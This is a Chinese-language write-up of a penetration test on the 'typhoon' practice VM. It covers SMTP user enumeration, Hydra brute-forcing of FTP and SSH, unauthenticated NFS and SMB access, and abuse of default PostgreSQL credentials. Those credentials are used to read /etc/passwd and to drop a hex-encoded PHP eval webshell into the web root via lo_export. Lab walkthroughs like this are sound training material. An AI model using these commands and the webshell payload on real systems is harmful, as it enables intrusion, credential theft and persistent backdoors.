typhoon靶机渗透

前言&靶机简介
这个靶机挺多漏洞 , 知识点很广 , 所以决定自己来打一遍 , 算是复习一些很久前的知识点 , 就从一个端口一个端口来渗透吧 , 看看有什么知识点
端口扫描

typhoon靶机渗透

文章插图
 
25端口用户名枚举为啥选这个端口呢 , 因为后面要渗透21和22端口很大可能会爆破 , 25端口版本为Postfix smtpd , 可以进行用户名枚举 , 为后面爆破提供方便
typhoon靶机渗透

文章插图
 
存在root、typhoon、admin这三个用户
未授权访问使用nc连接25端口不过貌似不能发邮件
21端口首先在网上搜了一下vsftpd 3.0.2这个版本有没有什么漏洞 , 没有结果 , 于是尝试一些通用的基本操作
ftp匿名访问探测了一下发现存在ftp匿名访问
typhoon靶机渗透

文章插图
 
于是登录一下 , 查看当前路径及列目录
typhoon靶机渗透

文章插图
 
尝试上传文件
typhoon靶机渗透

文章插图
 
发现权限不允许 , 所以21端口暂时没有其它利用方式
ftp爆破因为知道了存在以上用户 , 所以使用hydra爆破
typhoon靶机渗透

文章插图
 
得到了typhoon的密码继续爆破admin的密码 , 同样成功爆破
typhoon靶机渗透

文章插图
 
root爆破无果
22端口账号密码和21端口一样
typhoon靶机渗透

文章插图
 

typhoon靶机渗透

文章插图
 
111&2049端口这是一个NFS服务 , 测试一下是否存在未授权访问允许挂载文件 , 确实存在
typhoon靶机渗透

文章插图
 
查询目标NFS共享目录情况
showmount -e 192.168.80.4
typhoon靶机渗透

文章插图
 
然后挂载typhoon目录
mount -t nfs 192.168.80.4:/typhoon /tmp/mut/
typhoon靶机渗透

文章插图
 
445端口使用enum4linux枚举目标共享信息
enum4linux 192.168.80.4
typhoon靶机渗透

文章插图
 
也顺便列出了存在的用户名typhoon、admin、postfixuser
typhoon靶机渗透

文章插图
 
发现允许空账户、空密码登录 , 共享文件typhoon远程挂载 , 密码随便输就行
typhoon靶机渗透

文章插图
 

typhoon靶机渗透

文章插图
 
5432端口这个端口是PostgreSQL数据库 , 尝试爆破一下账号密码账号密码都为postgres
typhoon靶机渗透

文章插图
 
读/etc/passwdDROP TABLE if EXISTS ghtwf01;CREATE TABLE ghtwf01(t TEXT);COPY ghtwf01 FROM '/etc/passwd';SELECT * FROM ghtwf01;
typhoon靶机渗透

文章插图
 
写一句话【typhoon靶机渗透】创建OID , 清空内容
SELECT lo_create(4444);delete from pg_largeobject where loid=4444;将一句话木马16进制编码为
3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E插入
insert into pg_largeobject (loid,pageno,data) values(4444, 0, decode('3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E', 'hex'));导出数据到指定文件
SELECT lo_export(4444, '/var/www/html/shell.php');
typhoon靶机渗透

文章插图
 
成功getshell
typhoon靶机渗透


推荐阅读